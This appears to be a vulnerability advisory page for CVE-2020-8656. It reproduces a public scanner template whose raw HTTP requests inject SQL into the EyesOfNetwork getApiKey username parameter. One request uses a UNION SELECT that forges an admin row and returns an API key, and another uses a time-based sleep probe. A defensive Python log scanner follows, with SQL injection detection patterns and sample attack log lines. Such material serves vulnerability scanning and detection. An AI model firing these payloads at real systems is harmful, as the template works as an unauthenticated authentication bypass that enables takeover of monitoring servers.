CVE-2020-8656: EyesOfNetwork - Hardcoded API Key & SQL Injection

Date: 2025-08-01 | Affected software: EyesOfNetwork | PoC: public

Vulnerability description

An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.

PoC code [public]

id: CVE-2020-8656

info:
  name: EyesOfNetwork - Hardcoded API Key & SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
  reference:
    - https://www.exploit-db.com/exploits/48025
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8656
    - https://github.com/EyesOfNetworkCommunity/eonapi/issues/17
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8656
    epss-score: 0.78113
    epss-percentile: 0.98957
    cwe-id: CWE-798
    cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: eyesofnetwork
    product: eyesofnetwork
    fofa-query: title="EyesOfNetwork"
  tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln,vkev

http:
  - raw:
      - |
        GET /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "EONAPI_KEY")'
        condition: and

      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'status_code_2 == 401'
          - 'contains_all(body_2, "api_version", "username-password credentials")'
        condition: and
# digest: 4a0a0047304502202946f6cd2397e18f564357c5fafb69c562dee47460f1c6199d67a2cf8d61a7b0022100af95e6d905e787fdc7afa310cfe955fc924a7530a5d38bba50f0b4e2cd23d053:922c64590222798bb761d5b6d8e72950
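
For defenders, the same request shape can be hunted in web server access logs. The following is an added example, not part of the template above or of the EyesOfNetwork project: it flags getApiKey calls whose URL-decoded username parameter contains SQL syntax. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line and status code inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# SQL syntax that has no place in a username value.
SQLI_RE = re.compile(r"'|\b(union|select|sleep|benchmark)\b|--|/\*", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /eonapi/getApiKey?username=admin&password=x HTTP/1.1" 401 112',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /eonapi/getApiKey?&username=%27%20union%20select%201,2%20or%20%27&password=x HTTP/1.1" 200 98',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0%20or%20%27 HTTP/1.1" 401 130',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /favicon.ico HTTP/1.1" 200 50',
]

def suspicious_getapikey(line):
    """Return a finding dict for a getApiKey request with SQL syntax in username, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.rstrip("/").lower().endswith("/eonapi/getapikey"):
        return None
    # parse_qs URL-decodes values, so %27 and %20 are matched as ' and space.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("username", []):
        hit = SQLI_RE.search(value)
        if hit:
            return {
                "client": line.split(" ", 1)[0],
                "status": int(m.group("status")),
                "username": value,
                "matched": hit.group(0),
                # Heuristic: the template treats HTTP 200 on this request as a returned key.
                "key_likely_issued": m.group("status") == "200",
            }
    return None

def scan(lines):
    """Return findings for every suspicious line, in input order."""
    return [f for f in map(suspicious_getapikey, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `key_likely_issued` set warrants rotating API keys and reviewing later requests from the same client.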
